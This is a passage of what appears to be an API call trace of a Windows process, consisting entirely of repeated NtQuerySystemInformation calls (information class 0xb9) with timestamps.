NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f230, Length=0x38, ResultLength=0x0) [0238.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.603] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.603] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.603] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.603] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.604] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.604] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.609] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.609] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.609] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.609] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f230, Length=0x38, ResultLength=0x0) [0238.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.618] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.618] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.618] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.618] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.618] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.618] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.619] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.619] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.619] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.619] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.619] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.619] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.620] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.620] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.620] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.620] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f230, Length=0x38, ResultLength=0x0) [0238.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.625] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.625] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.625] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.625] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.625] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.626] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.626] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.626] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.626] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f230, Length=0x38, ResultLength=0x0) [0238.626] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.626] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.631] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.631] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.631] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.631] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.631] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.631] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f230, Length=0x38, ResultLength=0x0) [0238.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.633] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.633] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.633] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.633] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.633] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.633] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f230, Length=0x38, ResultLength=0x0) [0238.635] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.635] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.635] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.635] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.635] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0238.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f310, Length=0x40, ResultLength=0x0) [0238.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.663] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.663] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.663] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.663] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.663] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.663] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.663] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.663] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.663] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.669] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.669] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.669] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.669] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.669] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.669] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.669] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.669] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.669] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.670] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.670] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.670] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.670] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.670] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.670] NtQuerySystemInformation (SystemInformationClass=0xb9, 